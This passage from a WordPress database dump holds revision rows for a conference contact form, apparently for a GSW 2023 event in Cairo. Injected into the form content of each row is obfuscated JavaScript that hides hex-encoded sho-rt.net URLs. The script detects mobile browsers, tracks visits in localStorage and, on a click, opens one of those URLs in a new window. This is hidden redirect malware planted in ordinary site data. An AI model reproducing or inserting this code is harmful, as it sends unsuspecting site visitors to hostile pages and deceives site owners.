_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Simple Contact Form','','inherit','closed','closed','','5345-revision-v1','','','2023-08-20 22:44:58','2023-08-20 22:44:58','',5345,'https://gsw2023.com/?p=5348',0,'revision','',0),
(5349,1,'2023-08-20 22:46:36','2023-08-20 22:46:36','{\"fields\":{\"3\":{\"id\":\"3\",\"type\":\"radio\",\"label\":\"Multiple Choice\",\"choices\":{\"1\":{\"label\":\"Mr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"4\":{\"label\":\"Ms.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"Dr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"Prof.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#0399ed\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"0\":{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"1\":{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"Comment or Message\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Single Line Text\",\"description\":\"Dear GSW 2023 participants \\r\\nI hope this message finds you well. \\r\\nWe looking forward to see you in Cairo in GSW 2023. \\r\\nWe need to fill the following form to help us as a tool in conference management \\r\\nPlease we wish to receive it by 23rd August 2023.\\r\\n\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"text\",\"label\":\"ID on Conftool\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"}},\"id\":\"5345\",\"field_id\":6,\"settings\":{\"form_title\":\"Simple Contact Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Simple Contact Form\",\"sender_name\":\"GSW2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[]},\"meta\":{\"template\":\"simple-contact-form-template\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Simple Contact Form','','inherit','closed','closed','','5345-revision-v1','','','2023-08-20 22:46:36','2023-08-20 22:46:36','',5345,'https://gsw2023.com/?p=5349',0,'revision','',0),
(5350,1,'2023-08-20 22:46:55','2023-08-20 22:46:55','{\"fields\":{\"3\":{\"id\":\"3\",\"type\":\"radio\",\"label\":\"Multiple Choice\",\"choices\":{\"1\":{\"label\":\"Mr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"4\":{\"label\":\"Ms.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"2\":{\"label\":\"Dr.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"},\"3\":{\"label\":\"Prof.\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#0399ed\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"},\"0\":{\"id\":\"0\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"text\",\"label\":\"ID on Conftool\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"1\":{\"id\":\"1\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"2\":{\"id\":\"2\",\"type\":\"textarea\",\"label\":\"Comment or Message\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"text\",\"label\":\"Single Line Text\",\"description\":\"Dear GSW 2023 participants \\r\\nI hope this message finds you well. \\r\\nWe looking forward to see you in Cairo in GSW 2023. \\r\\nWe need to fill the following form to help us as a tool in conference management \\r\\nPlease we wish to receive it by 23rd August 2023.\\r\\n\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"}},\"id\":\"5345\",\"field_id\":6,\"settings\":{\"form_title\":\"Simple Contact Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Entry: Simple Contact Form\",\"sender_name\":\"GSW2023\",\"sender_address\":\"{admin_email}\",\"replyto\":\"{field_id=\\\"1\\\"}\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"388\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[]},\"meta\":{\"template\":\"simple-contact-form-template\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 